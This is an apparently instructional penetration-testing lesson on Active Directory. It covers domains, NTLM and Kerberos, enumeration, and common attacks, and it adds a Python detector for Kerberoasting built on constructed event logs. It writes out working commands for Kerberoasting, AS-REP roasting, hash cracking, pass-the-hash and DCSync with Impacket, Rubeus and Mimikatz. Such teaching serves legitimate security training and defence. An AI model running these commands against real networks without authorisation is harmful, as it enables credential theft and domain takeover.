Active Directory Basics

Intermediate | 50 min | Writeup

Introduction to Active Directory

Learning Objectives

  • Understand AD components
  • Learn about domains and trusts
  • Enumerate AD
  • Basic AD attacks

Active Directory (AD) is Microsoft's directory service that manages users, computers, and resources in Windows networks. Understanding AD is essential for enterprise penetration testing: it is the identity backbone of most large organisations, and almost every internal engagement ends up interacting with it.

AD was introduced with Windows 2000 and remains the dominant enterprise identity management system. Even with cloud adoption, hybrid environments mean AD skills remain critical.

AD Structure

```text
# Active Directory Hierarchy:

Forest
├── Domain (e.g., corp.local)
│   ├── Organizational Units (OUs)
│   │   ├── Users
│   │   ├── Computers
│   │   └── Groups
│   ├── Domain Controllers
│   └── Group Policy Objects (GPOs)
└── Child Domains

# Key concepts:
# - Forest: one or more domain trees sharing a schema and global catalog; the real security boundary
# - Domain: logical grouping of objects with its own database partition and its own administrators
# - OU: container used to organise objects and to scope GPOs and delegated admin rights
# - DC: server holding a writable copy of the AD database (NTDS.dit) and running the Kerberos KDC
# - GPO: policy settings applied to users/computers in the sites, domains or OUs the GPO is linked to
```

Domain Naming

Domain names follow DNS format (corp.local, company.com). The ".local" suffix is common in internal networks. A user is written either in NetBIOS form, "DOMAIN\username", or as a user principal name (UPN), "username@domain.local"; most tools accept both.

AD Objects

```text
# Users
# - Security principals identified by a SID (domain SID + RID)
# - Can authenticate to the domain
# - Attributes: sAMAccountName, userPrincipalName, memberOf, servicePrincipalName, userAccountControl, ...
#   (the password hash is stored in NTDS.dit and is never returned over LDAP)

# Computers
# - Also security principals!
# - Machine accounts (COMPUTERNAME$) with long random passwords rotated every 30 days by default
# - Can be compromised for lateral movement and for delegation abuse

# Groups
# - Security groups: assign permissions (can appear in ACLs and access tokens)
# - Distribution groups: email lists only, cannot be used in ACLs

# Key built-in groups:
# - Domain Admins: full control of the domain; local admin on every domain-joined machine by default
# - Enterprise Admins: forest-wide admin; the group exists only in the forest root domain
# - Domain Controllers: all DCs in the domain
# - Domain Users: all domain users (every user account is a member by default)
# - Domain Computers: all domain-joined computers
```

Authentication

NTLM Authentication

```text
# NTLM (NT LAN Manager): legacy challenge-response, still enabled almost everywhere

# Flow (NTLMv2):
# 1. NEGOTIATE: client announces itself and its capabilities
# 2. CHALLENGE: server sends an 8-byte random nonce
# 3. AUTHENTICATE: client answers with an HMAC-MD5 computed from its NT hash over the nonce
#    (the cleartext password is never needed, only the hash)
# 4. Server forwards the response to a DC (Netlogon) for domain accounts, or checks the local SAM

# Hash line format (secretsdump / mimikatz style):
# username:RID:LM hash:NT hash:::
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# aad3b435... is the "LM hash not stored" placeholder; 31d6cfe0... is the NT hash of an empty password

# Weaknesses:
# - Pass-the-Hash (PtH): the NT hash is password-equivalent, so it can be used directly
# - NTLM Relay: forward the challenge/response to another host when SMB/LDAP signing is not required
# - Credential theft: NT hashes sit in LSASS memory, the SAM and NTDS.dit
```

Kerberos Authentication

```text
# Kerberos: the default, ticket-based authentication for domain accounts

# Components:
# - KDC (Key Distribution Center): runs on every DC; made up of the AS and TGS services
# - TGT (Ticket Granting Ticket): proof of identity, encrypted with the krbtgt account's key
# - TGS (Ticket Granting Service): the KDC service that issues service tickets; each service ticket
#   is encrypted with the target service account's key

# Authentication flow:
# 1. AS-REQ: user asks the KDC for a TGT (pre-authentication: a timestamp encrypted with the user's key)
# 2. AS-REP: KDC returns the TGT plus a session key encrypted with the user's key
# 3. TGS-REQ: user presents the TGT and asks for a ticket to a service (identified by its SPN)
# 4. TGS-REP: KDC returns the service ticket
# 5. AP-REQ: user presents the service ticket to the service (AP-REP follows only if mutual auth is requested)

# Attacks:
# - Kerberoasting: any domain user can request a ticket for any SPN, then crack the service account's key offline
# - AS-REP Roasting: accounts with pre-auth disabled hand material encrypted with their key to anyone who asks
# - Golden Ticket: forge TGTs with the krbtgt key (survives until krbtgt's password is rotated twice)
# - Silver Ticket: forge service tickets with one service account's key; the DC is never contacted
```

Understanding Kerberos is crucial for AD attacks; most enterprise penetration tests involve Kerberoasting or another ticket-based attack.

AD Enumeration

```powershell
# From Windows (domain-joined host)

# Basic domain info (built-in; works from cmd or PowerShell)
net user /domain
net group /domain
net group "Domain Admins" /domain

# ActiveDirectory PowerShell module (needs RSAT or a DC; absent on most workstations)
Get-ADUser -Filter *
Get-ADGroup -Filter *
Get-ADComputer -Filter *
Get-ADDomainController -Filter *

# PowerView (PowerSploit): dot-source the script, it is not an installed module
. .\PowerView.ps1
Get-NetDomain
Get-NetUser
Get-NetGroup
Get-NetComputer
Get-NetGPO
Find-LocalAdminAccess   # noisy: authenticates to every host in the domain
```
```bash
# From Linux (remotely)

# LDAP enumeration (anonymous bind; if the DC refuses it, add -D user@corp.local -w password)
ldapsearch -x -H ldap://DC_IP -b "DC=corp,DC=local"

# RPC enumeration (null session)
rpcclient -U "" -N DC_IP
rpcclient $> enumdomusers
rpcclient $> enumdomgroups

# SMB enumeration
enum4linux -a DC_IP
crackmapexec smb DC_IP -u '' -p '' --users   # CrackMapExec now lives on as NetExec (nxc), same syntax

# BloodHound collection (needs valid domain credentials; -ns points DNS resolution at the DC)
bloodhound-python -d corp.local -u user -p password -ns DC_IP -c All
```

BloodHound

BloodHound visualizes AD relationships and attack paths. It is the fastest way to find paths to Domain Admin, so run it on every AD engagement, but be aware that collection is not quiet: session and local-admin collection authenticates to every reachable host, and the LDAP queries stand out in DC logs.

Common AD Attacks

```bash
# Kerberoasting
# Find accounts with an SPN, request service tickets for them, crack the tickets offline

# Impacket (any valid domain account will do)
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

# Rubeus (Windows, from a domain context)
Rubeus.exe kerberoast /outfile:hashes.txt

# Crack with hashcat (13100 = Kerberos 5 TGS-REP etype 23 / RC4; AES tickets need -m 19600/19700)
hashcat -m 13100 hashes.txt rockyou.txt
```
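Everything above is the attacker's view; the same activity has a clear footprint on the DC, and a tester should know what the blue team will see. As an added example that is not from the original page, here is the defender's check: Kerberoasting shows up as Event ID 4769 (a Kerberos service ticket was requested) with `TicketEncryptionType` 0x17 (RC4-HMAC) for many distinct service accounts in a short window, all from one user and source IP. The log lines are constructed, the field names are the real 4769 fields, and the five-minute window and threshold of three are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

# Constructed Event ID 4769 records, flattened to key=value pairs (not captures from a real DC).
# ServiceName in 4769 is the service *account* (sAMAccountName), not the SPN string.
SAMPLE_4769 = """\
2024-05-01T09:00:01 TargetUserName=jsmith@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.55 Status=0x0
2024-05-01T09:00:05 TargetUserName=WS01$@CORP.LOCAL ServiceName=WS02$ TicketEncryptionType=0x12 IpAddress=::ffff:10.0.1.21 Status=0x0
2024-05-01T09:01:10 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.77 Status=0x0
2024-05-01T09:01:10 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.77 Status=0x0
2024-05-01T09:01:11 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.77 Status=0x0
2024-05-01T09:01:11 TargetUserName=contractor7@CORP.LOCAL ServiceName=svc_report TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.77 Status=0x0
2024-05-01T09:01:12 TargetUserName=contractor7@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.77 Status=0x0
2024-05-01T09:01:12 TargetUserName=contractor7@CORP.LOCAL ServiceName=WS05$ TicketEncryptionType=0x17 IpAddress=::ffff:10.0.1.77 Status=0x0
2024-05-01T09:02:00 TargetUserName=admin@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x12 IpAddress=::ffff:10.0.1.9 Status=0x0
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_4769(text: str) -> list:
    """Turn the flattened records into dicts; 4769 writes IPv4 sources as ::ffff:a.b.c.d."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        ev = dict(FIELD.findall(rest))
        ev["time"] = datetime.fromisoformat(ts)
        ev["IpAddress"] = re.sub(r"^::ffff:", "", ev.get("IpAddress", ""))
        events.append(ev)
    return events


def is_roast_candidate(ev: dict) -> bool:
    """RC4 ticket, successfully issued, for a user-type service account (what a roaster asks for)."""
    svc = ev.get("ServiceName", "")
    return (ev.get("TicketEncryptionType") == RC4_HMAC
            and ev.get("Status") == "0x0"
            and not svc.endswith("$")          # computer accounts: random keys, not crackable
            and svc.lower() != "krbtgt")       # TGT renewals, not a Kerberoast target


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3) -> dict:
    """Return {(user, source_ip): distinct_service_accounts} for sources over the threshold."""
    by_source = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_source[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    alerts = {}
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        best = 0
        for i, start in enumerate(evs):   # sliding window anchored at each request
            names = {e["ServiceName"] for e in evs[i:] if e["time"] - start["time"] <= window}
            best = max(best, len(names))
        if best >= threshold:
            alerts[source] = best
    return alerts


if __name__ == "__main__":
    for (user, ip), n in detect_kerberoasting(parse_4769(SAMPLE_4769)).items():
        print(f"possible Kerberoasting: {user} from {ip} requested RC4 tickets for {n} service accounts")
```

The RC4 filter is the strongest single signal because modern clients negotiate AES, so a burst of etype 0x17 requests from a Windows 10+ host is rarely legitimate; it is not sufficient on its own, since Rubeus and Impacket can request AES tickets too (cracked with hashcat 19600/19700), which is why the rule also counts distinct service accounts per source rather than keying on the encryption type alone.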
```bash
# AS-REP Roasting
# Attack accounts with "Do not require Kerberos pre-authentication" set; no password needed, only usernames

# Impacket
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip DC_IP -format hashcat

# Rubeus
Rubeus.exe asreproast /format:hashcat

# Crack with hashcat (18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 hashes.txt rockyou.txt
```

```bash
# Pass-the-Hash
# Use the NT hash instead of the password; -hashes takes LM:NT, so the empty LM part is just ":"

# Impacket
psexec.py corp.local/administrator@TARGET -hashes :NTLM_HASH
wmiexec.py corp.local/administrator@TARGET -hashes :NTLM_HASH

# CrackMapExec / NetExec
crackmapexec smb TARGET -u administrator -H NTLM_HASH
```

```bash
# DCSync
# Pull password hashes from the DC over the replication protocol (MS-DRSR)
# Requires "Replicating Directory Changes" and "Replicating Directory Changes All" on the domain:
# Domain Admins, Enterprise Admins and DCs have them by default; misconfigured ACLs often grant them to others

# Impacket (add -just-dc-ntlm to skip Kerberos keys and history)
secretsdump.py corp.local/admin:password@DC_IP

# Mimikatz
lsadump::dcsync /domain:corp.local /user:administrator
```

Essential AD Tools

```text
# Windows:
# - Mimikatz: credential extraction, ticket attacks, DCSync
# - Rubeus: Kerberos attacks (roasting, ticket requests, pass-the-ticket)
# - PowerView: AD enumeration
# - SharpHound: BloodHound data collection

# Linux:
# - Impacket: Python AD attack suite (secretsdump, GetUserSPNs, psexec, ...)
# - bloodhound-python: BloodHound collection without touching a Windows host
# - CrackMapExec / NetExec: Swiss army knife for SMB, LDAP, WinRM
# - Responder: LLMNR/NBT-NS/mDNS poisoning to capture NetNTLM responses

# Both:
# - BloodHound: graph-based attack path analysis
# - Hashcat: password cracking (modes 5600 NetNTLMv2, 13100 Kerberoast, 18200 AS-REP)
```

Knowledge Check


What does Kerberoasting target?

Key Takeaways

  • AD manages users, computers, and resources in Windows networks
  • Kerberos is ticket-based; NTLM uses challenge-response, and the NT hash alone is enough to answer the challenge
  • Kerberoasting targets service accounts with SPNs; AS-REP Roasting targets accounts with pre-authentication disabled; both only pay off when the password cracks
  • BloodHound visualizes attack paths to high-value targets
  • Domain Admins control one domain; Enterprise Admins (forest root domain only) control the forest
  • Compromising the krbtgt key enables Golden Ticket persistence